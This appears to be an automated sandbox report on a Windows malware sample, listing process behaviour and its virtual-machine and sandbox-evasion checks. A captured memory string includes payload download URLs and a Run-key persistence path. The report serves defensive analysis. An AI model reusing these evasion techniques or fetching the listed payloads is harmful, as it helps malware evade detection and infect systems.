      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: USER32NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSTARTUP KEYHTTPS://WWW.WIZUMIYA.CO.JP/HTML/USER_DATA/ORIGINAL/IMAGES/BIN_WUOAIR166.BINHTTP://FAHRSCHULE-HELI.AT/BIN_WUOAIR166.BIN
      Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000639904 second address: 000000000063990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 0000000000639B7E second address: 0000000000639B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dllJump to dropped file
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 18_2_1ED46DE6 rdtsc 18_2_1ED46DE6
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2992Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 666Jump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeAPI coverage: 5.7 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformationJump to behavior
      Source: explorer.exe, 00000022.00000003.711372871.0000000004AAB000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: explorer.exe, 00000022.00000003.678164630.0000000005FC7000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000003.727279202.0000000004D0A000.00000004.00000001.sdmpBinary or memory string: Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
      Source: explorer.exe, 00000022.00000003.719709332.00000000049A9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
      Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000003.722492029.0000000004CA9000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000022.00000003.719609820.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
      Source: powershell.exe, 00000004.00000002.562061021.00000000074C4000.00000004.00000001.sdmp, ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000022.00000003.726098821.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&0000004*
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpBinary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}gramFiles(x86)=C:\Program FBZ*
      Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\/
      Source: wscript.exe, 00000000.00000003.372188213.00000190E2BBF000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000003.709669298.0000000004C50000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563f-
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: explorer.exe, 00000022.00000003.717933251.0000000004BB9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000022.00000000.719680431.00000000060E2000.00000004.00000001.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}es
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\_:^
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000PROFILE=C:\Users\userwindir
      Source: ieinstal.exe, 00000012.00000002.603127626.0000000004B0A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
      Source: explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
